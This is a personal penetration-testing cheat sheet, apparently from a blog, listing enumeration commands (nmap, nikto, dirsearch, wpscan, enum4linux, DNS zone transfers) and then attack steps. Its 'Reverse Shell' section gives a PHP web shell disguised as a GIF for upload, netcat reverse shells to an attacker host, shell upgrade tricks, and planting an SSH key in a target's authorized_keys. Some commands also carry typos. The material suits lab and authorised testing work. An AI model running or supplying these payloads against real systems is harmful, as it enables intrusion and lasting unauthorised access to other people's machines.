
Intended for personal use, i use many websites and pages from my blog, i just want to have all those things into one cozy page.
Enumeration
Port
nmap
Simple quick and dirt with os and version detection :
nmap -A -O -v -T4 X.X.X.X
A more complete one :
nmap -sV -sC -oA tcpnmap X.X.X.X
Custom one to see if there is some special ports :
nmap -A -O -v -T4 --top-ports 5000 -oA tcptop5000nmap X.X.X.X
UDP :
nmap -sU -oA udpnmap X.X.X.X
P.S. -p- to scan all ports (take a break and go make a sandwich)
Webservice
Nikto
nikto -h X.X.X.X
Uniscan
uniscan -u http://X.X.X.X/ -qweds
Dirbuster
Start de gui :
dirbuster
most used list :
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Dirb
dirb http://X.X.X.X /usr/share/dirb/wordlists/common.txt
(also big.txt is interesting)
Dirsearch
git clone http://github.com/maurosoria/dirsearch python3 dirsearch.py -u http://X.X.X.X -e php -w /usr/share/wordlists/dirbuster/directory-lit-2.3-medium.txt -f -t 20
-f force extention
-r (recursive if needed)
Wpscan
wpscan --url http://X.X.X.X/wordpress --enumerate u vp vt
droopescan
Up to date drupal scanner
droopescan scan drupal -u X.X.X.X
Burp
…
Enum4linux
For extensive enum. enum4linux :
enum4linux -a -o -n -v X.X.X.X
DNS
NSLOOKUP
nslookup >SERVER X.X.X.X >127.0.0.1 Server: ... Address: ... >X.X.X.X Server: ... Address: ... >box.com Server: ... Address: ... Name: box.com Address:X.X.X.X
dnsrecon
Reverse lookup brute force:
dnsrecon -r 127.0.0.0/24 -n X.X.X.X
dnsrecon -r 127.0.1.0/24 -n X.X.X.X
dnsrecon -r X.X.X.0/24 -n X.X.X.X
dns zone transfer
Reverse lookup brute force:
dig axfr @X.X.X.X
We can get few extra subdomains/domainfiles :
dig axfr box.com@X.X.X.X
add a dns server
edit :
/etc/resolf.conf nammeserver X.X.X.X
Reverse Shell
To test
gif to upload to test
GIF8 <?php echo system($_REQUEST['command']); ?>xxxx.gif?command=idIf it works
xxxx.gif?command=nc -e /bin/sh KALIIP 8081
netcat
TCP
On kali box : nc -lvnp 8081
nc -e /bin/sh KALIIP 8081
UDP
**(need to check -e -u)***
On kali box : nc -u -lvnp 8081
nc -e -u /bin/sh KALIIP 8081
To have full shell :
python -c 'import pty;pty.spawn("/bin/bash");'
Background with CTRL+Z
stty raw -echo fg [enter]
(sometime you need to enter the command bash)
Create ssh keyset
ssh-keygen PATH : /root/ssh_key
and the key generated need to be put inside the server
/home/user/.ssh/authorized_keys
to connect :
ssh -i ssh_key user@X.X.X.X
Usefull links:
Privilege Escalation
LinEnum.sh
linuxprivchecher.py
unixprivesc.sh
sudo info
to see if user can run command as sudo :
sudo -l
to see the version of sudo
dpkg -l sudo
Grab exploit directly from searchsploit :
searchsploit -x (put the path)
…